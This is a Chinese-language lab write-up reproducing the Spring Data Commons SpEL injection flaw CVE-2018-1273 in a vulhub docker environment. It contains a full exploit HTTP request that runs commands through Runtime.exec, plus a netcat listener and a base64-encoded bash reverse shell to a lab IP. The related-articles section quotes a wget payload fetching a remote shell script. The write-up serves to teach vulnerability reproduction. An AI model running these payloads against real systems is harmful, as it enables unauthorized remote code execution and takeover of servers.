Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)

最新推荐文章于 2024-03-12 10:31:05 发布
最新推荐文章于 2024-03-12 10:31:05 发布
阅读量212 收藏 2
点赞数 1
分类专栏: 反序列化漏洞 文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42786460/article/details/132919796
版权

SpringDataCommons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)

[poc]

1 在线漏洞解读:

https://vulhub.org/#/environments/spring/CVE-2018-1273/

Spring Data Commons 在2.0.5及以前版本中,存在SpEL表达式注入漏洞

在这里插入图片描述

2 环境搭建

cd  /home/kali/vulhub/spring/CVE-2018-1273

在这里插入图片描述

2.1 启动:
sudo docker-compose up -d

sudo docker-compose ps -a
sudo docker ps -a
2.2 已启动:访问端口8098

在这里插入图片描述

3 影响版本:

​ ​ Spring Data Commons <= 2.0.5版本

4 漏洞复现

4 漏洞复现

4.1 访问页面

​ 访问页面http://192.168.225.166:8098/users

在这里插入图片描述

4.2 bp抓包,修改参数
4.2.1链接中的Payload,在注册的时候抓包转发repeater,并修改成如下数据包:
POST /users?page=&size=5 HTTP/1.1
Host: 192.168.225.166:8098
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
Origin: http://192.168.225.166:8098
Connection: close
Referer: http://192.168.225.166:8098/users
Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
4.2.2 核心指令,send发送,类的反序列化
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

在这里插入图片描述

4.2.3 查看docker容器,看文件已创建,存在漏洞
sudo docker ps -a
sudo docker exec -it d63fc660cd63  /bin/bash

在这里插入图片描述

5 漏洞利用

5.1 构建反弹shell
nc   -lvp  6666   # l是监听模式;v是显示详细信息;p是指定端口;

bash -i &> /dev/tcp/192.168.225.166/6666 0<&1  # 反弹交互指令tcp服务

=============解释==================
bash -c {echo,base64编码一句话shell}|{base64,-d}|{bash,-i}

==============最终组合=================
# https://ares-x.com/tools/runtime-exec/转换
bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPCYx}|{base64,-d}|{bash,-i}
5.2 核心poc利用
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPCYx}|{base64,-d}|{bash,-i}")]=&password=&repeatedPassword=

在这里插入图片描述

5.3 成功反弹shell,获取root

在这里插入图片描述

煜磊
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux漏洞分析,Spring-data-commons(CVE-2018-1273)漏洞分析
weixin_39830303的博客
05-13 811
前言CVE-2018-1273 是 Spring-data-commons近期爆出的一个可远程执行代码的漏洞,为了了解更多细节,本文将从漏洞的成因,漏洞的判定以及漏洞的利用三个方面来进行详细说明。漏洞的成因当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容,而这一步就是本次漏洞的爆发点。漏洞的判定...
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
[春秋云镜]CVE-2018-1273
niubi707的博客
12-02 5284
[春秋云镜]CVE-2018-1273Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
黑白的博客
12-20 2505
声明 好好学习,天天向上 漏洞描述 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 影响范围 · Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) · Spring Data REST 2.6 - 2
spring(CVE-2018-1273)远程代码执行漏洞复现
最新发布
勤劳的码农的博客
03-12 9238
Spring DataSpring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
漏洞复现 | CVE-2018-1273 Spring Data Commons 远程命令执行
weixin_42282189的博客
09-15 1546
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 受影响版本: Spring Data Commons 1.13 – 1.13.10 (Inga.
vulhub中SpringSpring Data Commons 远程命令执行漏洞(CVE-2018-1273)
weixin_41438728的博客
12-02 1354
vulhub中SpringSpring Data Commons 远程命令执行漏洞(CVE-2018-1273)漏洞复现漏洞说明漏洞利用条件和方式漏洞影响范围漏洞检测环境搭建漏洞复现漏洞修复 漏洞复现 漏洞说明 漏洞利用条件和方式 漏洞影响范围 漏洞检测 环境搭建 漏洞复现 漏洞修复 ...
Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273)
wutiangui的博客
09-10 662
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
[Java安全]Spring Data Commons之CVE-2018-1273
snowlyzz的博客
02-08 627
从CVE-2018-1273看漏洞分析
spring-data-commons-2.0.6.RELEASE-API文档-中文版.zip
07-14
赠送jar包:spring-data-commons-2.0.6.RELEASE.jar; 赠送原API文档:spring-data-commons-2.0.6.RELEASE-javadoc.jar; 赠送源代码:spring-data-commons-2.0.6.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
spring-data-commons-2.3.9.RELEASE-API文档-中文版.zip
07-13
赠送jar包:spring-data-commons-2.3.9.RELEASE.jar; 赠送原API文档:spring-data-commons-2.3.9.RELEASE-javadoc.jar; 赠送源代码:spring-data-commons-2.3.9.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
spring-data-commons-2.5.5-API文档-中文版.zip
06-04
赠送jar包:spring-data-commons-2.5.5.jar; 赠送原API文档:spring-data-commons-2.5.5-javadoc.jar; 赠送源代码:spring-data-commons-2.5.5-sources.jar; 赠送Maven依赖信息文件:spring-data-commons-2.5.5....
cve-2018-1273 Spring Expression Language 漏洞分析
whatday的专栏
07-31 988
目录 0x00 背景 x01 漏洞影响 受影响的范围 0x02 SpEL 类类型表达式 类实例化 变量和函数的使用 0x03 SpEL调试 0x04 实战分析 CVE-2018-1273 攻击Exploit的诞生 0x00 背景 最近Spring框架不大太平,接连爆出来多个RCE远程代码执行的CVE漏洞,其中有CVE-2018-1270,CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。 x0
Spring RCE漏洞分析2(CVE-2018-1273)
hldfight
05-07 1839
0x00 前言 继续分析Spring的历史漏洞,本篇记录Spring Data Commons的远程代码执行漏洞(CVE-2018-1273)的分析。 0x01 环境搭建 使用的Spring Data Example Projects提供的示例代码。 但该项目中包含有15个子模块,如果将其整体导入IDEA,则需要下载所有模块中的依赖,显然这是没有必要的。通过参考这篇文章,发现只需导入web模块中的...
Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)漏洞验证与getshell
qq_45300786的博客
08-02 1048
利用条件 影响版本 · Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) · Spring Data REST 2.6 - 2.6.10 (Ingalls SR10) · Spring Data Commons 2.0 to 2.0.5 (Kay SR5) · Spring Data REST 3.0 - 3.0.5 (Kay SR5) 复现过程 vulhub 详细过程请看Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
Spring Data Commons-远程命令执行漏洞(CVE-2018-1273)
qq_43381463的博客
04-19 360
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令
spring 代码执行 (CVE-2018-1273)
YouthBelief的博客
11-11 1394
spring 代码执行 CVE-2018-1273spring 代码执行 (CVE-2018-1273)0x01 漏洞描述0x02 影响范围0x03 漏洞复现wget弹shell0x04 漏洞修复 spring 代码执行 (CVE-2018-1273) 0x01 漏洞描述 Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 0x02 影
描述**CVE**-2019-0232 Apache Tomcat远程代码执行漏洞
05-28
CVE-2019-0232是Apache Tomcat中的一个严重漏洞,可以允许攻击者通过特制的请求发送远程代码执行命令,从而控制Tomcat服务器。该漏洞由于存在于Tomcat中使用的Apache Commons FileUpload库中的一个漏洞,因此也被称为“Apache Commons FileUpload远程代码执行漏洞”。 攻击者可以构造一个特制的HTTP请求,该请求中包含恶意的JSP文件,并将该JSP文件传到Tomcat服务器上的一个目录中。一旦成功上传,攻击者可以通过直接访问该JSP文件来执行任意命令,包括获取服务器上的敏感数据或在服务器上执行其他恶意操作。 这个漏洞影响到Apache Tomcat 9.0.0.M1到9.0.17、8.5.0到8.5.39和7.0.0到7.0.93版本。Apache Tomcat官方已经发布了修复这个漏洞的补丁程序,建议用户尽快升级到最新版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值